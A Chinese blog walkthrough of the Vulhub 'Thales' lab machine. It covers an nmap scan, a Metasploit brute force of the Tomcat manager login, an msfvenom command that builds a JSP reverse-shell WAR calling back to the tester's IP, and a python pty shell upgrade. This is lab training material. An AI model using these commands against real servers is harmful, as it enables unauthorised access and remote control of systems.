当前位置: 首页 > news >正文

vulhub-Thales靶场攻略

news 2025/7/31 17:15:53

1.我们打开靶机,可能会需要改一下网卡配置,博主之前写过,这里就不写了,我们找到所属网段去拿nmap去扫描

2.我们找到IP之后访问一下,界面如下

3.我们可以看到他有一个登录框,我们尝试着爆破一下

4.接下来我们拿msf来爆破一下

msfconsole
search tomcat login
set rhosts 192.168.142.153
run

5.我们来登录一下

6.我们发现有一个文件上传的地方,我们来构造war文件,去kali生成一个反弹shell文件

msfvenom  -p java/jsp_shell_reverse_tcp LHOST=192.168.142.137 LPORT=9999 -f war -o shell.war

7.然后我们开启监听,我们改一下生成的文件名为doma.war

8.连接上之后可以使用以下命令构造成一个交互的命令

python3 -c "import pty;pty.spawn('/bin/bash')"

http://www.dtcms.com/a/307110.html

相关文章:

  • git的开发流程
  • # C语言:20250730学习(二级指针)
  • OneCode 3.0 快速视图在 DDD 领域模型中的应用研究
  • 「Linux命令基础」管理文件
  • 【动态规划 | 多状态问题】动态规划求解多状态问题
  • 7. 传输层协议 TCP
  • 低速信号设计之 MDIO 篇
  • 7.5将模块分离到不同的文件中
  • FastAPI入门:表单数据、表单模型、请求文件、请求表单与文件
  • 电商项目统一认证方案设计与实战
  • 《JWT + OAuth2统一认证授权:企业级单点登录方案》
  • 【硬件-笔试面试题】硬件/电子工程师,笔试面试题-50,(知识点:TCP/IP 模型)
  • NSGA-III(Non-dominated Sorting Genetic Algorithm III)简介
  • MySQL数据一致性与主从延迟深度解析:从内核机制到生产实践
  • 数据集相关类代码回顾理解 | DataLoader\datasets.xxx
  • 广东省省考备考(第六十一天7.30)——资料分析、数量(强化训练——重点复习回顾)
  • 数据库初阶笔记
  • JavaWeb笔记14
  • C语言15-构造数据类型、位运算符、内存管理
  • Ⅹ—6.计算机二级综合题15---18套
  • 魔塔社区上文生图大模型对比
  • 涉及实验(随机分组)的一些概念
  • 【UEFI系列】EFI Memory Map内存映射 and type
  • cpp-httplib 线程安全
  • Tableau 2019可视化数据分析软件安装包下载安装教程
  • Java基础面试总结(八股)
  • 【硬件-笔试面试题】硬件/电子工程师,笔试面试题-49,(知识点:OSI模型,物理层、数据链路层、网络层)
  • 复现CLIP(对比语言图像预训练)
  • windows通过WSL配置linux环境
  • 重生之我在10天内卷赢C++ - DAY 2